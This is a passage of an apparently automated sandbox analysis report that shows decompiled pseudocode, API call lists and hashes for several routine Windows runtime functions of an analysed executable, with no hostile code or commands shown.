                  • Opcode Fuzzy Hash: 40101904e8074d280dcb2c4609b351c52c5efd4c9a9780d6c8a9c199d9d1a8af
                  • Instruction Fuzzy Hash: EE118F71A00714EFD720DFA2D885B9BB7B4FB44724F94403BE94566A81D3B9A848CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041C884(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t23;
                  				intOrPtr* _t47;
                  				void* _t48;
                  				void* _t49;
                  
                  				_t49 = __eflags;
                  				E00431A9B(E0044BA0A, __ebx, __edi, __esi);
                  				E00423242(__ebx, _t48 - 0x14, __edi, __esi, _t49);
                  				_t47 =  *((intOrPtr*)(_t48 + 8));
                  				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
                  				_t23 = E00423194(_t47, _t48 - 0x14);
                  				 *((intOrPtr*)( *_t47 + 0x50))(_t48 - 0x24, GetSysColor(0xc));
                  				E0041B463(_t47,  *((intOrPtr*)(_t48 - 0x24)),  *((intOrPtr*)(_t48 - 0x20)),  *((intOrPtr*)(_t48 - 0x1c)) -  *((intOrPtr*)(_t48 - 0x24)),  *((intOrPtr*)(_t48 - 0x18)) -  *((intOrPtr*)(_t48 - 0x20)), 0xf00021);
                  				E00423194(_t47, _t23);
                  				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
                  				 *((intOrPtr*)(_t48 - 0x14)) = 0x452f4c;
                  				E0040ADD4(__ebx, _t48 - 0x14, _t23, _t47, _t49);
                  				return E00431B73(1);
                  			}








                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C889
                  • GetSysColor.USER32(0000000C), ref: 0041C890
                    • Part of subcall function 00423242: __EH_prolog3.LIBCMT ref: 00423249
                    • Part of subcall function 00423242: CreateSolidBrush.GDI32(?), ref: 00423264
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                    • Part of subcall function 0041B463: PatBlt.GDI32(?,?,?,?,?,?), ref: 0041B47A
                    • Part of subcall function 0040ADD4: __EH_prolog3_catch_GS.LIBCMT ref: 0040ADDE
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3ObjectSelect$BrushColorCreateH_prolog3_catch_Solid
                  • String ID: L/E
                  • API String ID: 1097662718-2456494276
                  • Opcode ID: e1a511be5031bb41064cd11203baab905edbaed639b95e56e1de4081b40d4594
                  • Instruction ID: 68ff83ec7e2eba05f79b04070f7d705b72ba532b61595986b3c127a4697d77d4
                  • Opcode Fuzzy Hash: e1a511be5031bb41064cd11203baab905edbaed639b95e56e1de4081b40d4594
                  • Instruction Fuzzy Hash: 76010872A001199BCB04EFE9C94AEEEB7F4AF08305F10415AF405B3191CB389E058BA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E00426219(void* __ecx, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t9;
                  				_Unknown_base(*)()* _t12;
                  				void* _t14;
                  				void* _t17;
                  				_Unknown_base(*)()* _t19;
                  				void* _t20;
                  
                  				_push(0);
                  				E00431A9B(E0044C14C, _t14, _t17, __esi);
                  				if(( *0x4668dc & 0x00000001) == 0) {
                  					 *0x4668dc =  *0x4668dc | 0x00000001;
                  					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
                  					_push("UxTheme.dll");
                  					 *0x4668d8 = E0040D5D6(_t14, __ecx, _t17, __esi,  *(_t20 - 4));
                  				}
                  				_t9 =  *0x4668d8; // 0x73310000
                  				_t19 =  *(_t20 + 0xc);
                  				if(_t9 != 0) {
                  					_t12 = GetProcAddress(_t9,  *(_t20 + 8));
                  					if(_t12 != 0) {
                  						_t19 = _t12;
                  					}
                  				}
                  				return E00431B73(_t19);
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 00426220
                  • GetProcAddress.KERNEL32(73310000,?), ref: 00426259
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressH_prolog3Proc
                  • String ID: UxTheme.dll
                  • API String ID: 3325816569-352951104
                  • Opcode ID: a4a852b16d3f4d644eb00760bbfc3205726ab498dccf1a41d59192cb352b88aa
                  • Instruction ID: 93154bf1de3ba644c085273ccdfcc23c9d4ad52bd39bf1df4da4c0410343f817
                  • Opcode Fuzzy Hash: a4a852b16d3f4d644eb00760bbfc3205726ab498dccf1a41d59192cb352b88aa
                  • Instruction Fuzzy Hash: 14E06530A012649BDB11BF76AC0571937D8BB04715F46406BFC00E72A1EBB989408B7D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0042282A(void* __ecx) {
                  				char _v8;
                  				intOrPtr* _v12;
                  				void* _t11;
                  
                  				_v8 = 0x466638;
                  				E00430CF4( &_v8, 0x45cfdc);
                  				asm("int3");
                  				return  *((intOrPtr*)( *_v12 + 4))(0, _t11, __ecx);
                  			}







                  APIs
                  • __CxxThrowException@8.LIBCMT ref: 00422840
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionException@8RaiseThrow
                  • String ID: 8fF$8fF
                  • API String ID: 3976011213-2798571808
                  • Opcode ID: b981e969448221579f3da19129567584c7e0524e6b7c9e5e8841d6a8c252ee54
                  • Instruction ID: bcc99a705935aa0b096279d8265c82760203fa9d8db396da574b4737db60febc
                  • Opcode Fuzzy Hash: b981e969448221579f3da19129567584c7e0524e6b7c9e5e8841d6a8c252ee54
                  • Instruction Fuzzy Hash: D5D05B7514434CBFC304DBC9D459E8ABBADDBC8714F214156F61887641DBB1FD00C665
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 61%
                  			E004209F9(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                  				signed int _v8;
                  				void* _t31;
                  				intOrPtr _t32;
                  				signed int _t38;
                  				struct _CRITICAL_SECTION* _t39;
                  				intOrPtr* _t44;
                  				long* _t47;
                  				intOrPtr* _t50;
                  
                  				_push(__ecx);
                  				_t50 = _a4;
                  				_t38 = 1;
                  				_t47 = __ecx;
                  				_v8 = 1;
                  				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
                  					L10:
                  					_t24 =  &(_t47[7]); // 0x466584
                  					_t39 = _t24;
                  					EnterCriticalSection(_t39);
                  					_t25 =  &(_t47[5]); // 0x46657c
                  					E00420679(_t25, _t50);
                  					LeaveCriticalSection(_t39);
                  					LocalFree( *(_t50 + 0xc));
                  					 *((intOrPtr*)( *_t50))(1);
                  					_t31 = TlsSetValue( *_t47, 0);
                  					L11:
                  					return _t31;
                  				} else {
                  					goto L1;
                  				}
                  				do {
                  					L1:
                  					_t32 = _a8;
                  					if(_t32 == 0) {
                  						L5:
                  						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
                  						if(_t44 != 0) {
                  							 *((intOrPtr*)( *_t44))(1);
                  						}
                  						_t31 =  *(_t50 + 0xc);
                  						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
                  						goto L8;
                  					}
                  					_t5 =  &(_t47[4]); // 0x5b88a8
                  					if( *((intOrPtr*)( *_t5 + 4 + _t38 * 8)) == _t32) {
                  						goto L5;
                  					}
                  					_t31 =  *(_t50 + 0xc);
                  					if( *(_t31 + _t38 * 4) != 0) {
                  						_v8 = _v8 & 0x00000000;
                  					}
                  					L8:
                  					_t38 = _t38 + 1;
                  				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
                  				if(_v8 == 0) {
                  					goto L11;
                  				}
                  				goto L10;
                  			}












                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,?,00466568,00466584,00466568,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF), ref: 00420A58
                  • LeaveCriticalSection.KERNEL32(00466584,00000000,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A68
                  • LocalFree.KERNEL32(?,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A71
                  • TlsSetValue.KERNEL32(00466568,00000000,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A83
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                  • String ID:
                  • API String ID: 2949335588-0
                  • Opcode ID: bd4760c49065bc264e8e5b21d6b9a7af9dba21f9fb3e279cf7a4ce5c93557814
                  • Instruction ID: c67d59306e024ad0e16bde5a0a6ba0c27b3e8643983254bc6767e2b362cbf32f
                  • Opcode Fuzzy Hash: bd4760c49065bc264e8e5b21d6b9a7af9dba21f9fb3e279cf7a4ce5c93557814
                  • Instruction Fuzzy Hash: B0116735600314EFD724CF59E884F5AB7E8FF55315F90806AE546876A2CBB4EC50CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00424385(signed int _a4) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct _CRITICAL_SECTION* _t4;
                  				void* _t7;
                  				void* _t9;
                  				signed int _t10;
                  				void* _t13;
                  				intOrPtr* _t14;
                  
                  				_t10 = _a4;
                  				_t15 = _t10 - 0x11;
                  				if(_t10 >= 0x11) {
                  					_t4 = E00406436(_t7, _t9, _t10, _t13, _t15);
                  				}
                  				if( *0x4666dc == 0) {
                  					_t4 = E0042431C();
                  				}
                  				_t14 = 0x466890 + _t10 * 4;
                  				if( *_t14 == 0) {
                  					EnterCriticalSection(0x466878);
                  					if( *_t14 == 0) {
                  						_t4 = 0x4666e0 + _t10 * 0x18;
                  						InitializeCriticalSection(_t4);
                  						 *_t14 =  *_t14 + 1;
                  					}
                  					LeaveCriticalSection(0x466878);
                  				}
                  				EnterCriticalSection(0x4666e0 + _t10 * 0x18);
                  				return _t4;
                  			}














                  APIs
                  • EnterCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243BF
                  • InitializeCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243D1
                  • LeaveCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243DE
                  • EnterCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243EE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                  • String ID:
                  • API String ID: 2895727460-0
                  • Opcode ID: dfab13008bdaf96ebf00f0eb18ec2ef9bb80e0054cfda95d03d59bec202288f4
                  • Instruction ID: 12cf9614eb4c710b7d9bc39edca722b45593c528368f68ea10bc041c1aee9ecf
                  • Opcode Fuzzy Hash: dfab13008bdaf96ebf00f0eb18ec2ef9bb80e0054cfda95d03d59bec202288f4
                  • Instruction Fuzzy Hash: 30F0C272301124AFDB106B5AFC45B1DB769FBD1355F520037F54083151EBB898408AAE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042055C(long* __ecx, signed int _a4) {
                  				void* _t9;
                  				struct _CRITICAL_SECTION* _t12;
                  				signed int _t14;
                  				long* _t16;
                  
                  				_t16 = __ecx;
                  				_t1 =  &(_t16[7]); // 0x466584
                  				_t12 = _t1;
                  				EnterCriticalSection(_t12);
                  				_t14 = _a4;
                  				if(_t14 <= 0) {
                  					L5:
                  					LeaveCriticalSection(_t12);
                  					return 0;
                  				}
                  				_t3 =  &(_t16[3]); // 0x3
                  				if(_t14 >=  *_t3) {
                  					goto L5;
                  				}
                  				_t9 = TlsGetValue( *_t16);
                  				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                  					goto L5;
                  				} else {
                  					LeaveCriticalSection(_t12);
                  					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                  				}
                  			}








                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042056A
                  • TlsGetValue.KERNEL32(00466568,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042057E
                  • LeaveCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 00420594
                  • LeaveCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042059F
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Leave$EnterValue
                  • String ID:
                  • API String ID: 3969253408-0
                  • Opcode ID: 340786f682d678f90d8c11d481e82e1f96306d9cde2d832645f35ad660a4072c
                  • Instruction ID: 125f687bcb126dd7327be4eaf8d3202bdee6bb285ee1efb8d35158a4d24e766b
                  • Opcode Fuzzy Hash: 340786f682d678f90d8c11d481e82e1f96306d9cde2d832645f35ad660a4072c
                  • Instruction Fuzzy Hash: 16F05476300228AFD7208F5AEC48C1B77EDFA893613554466F54693222D674F881CEDC
                  Uniqueness

                  Uniqueness Score: -1.00%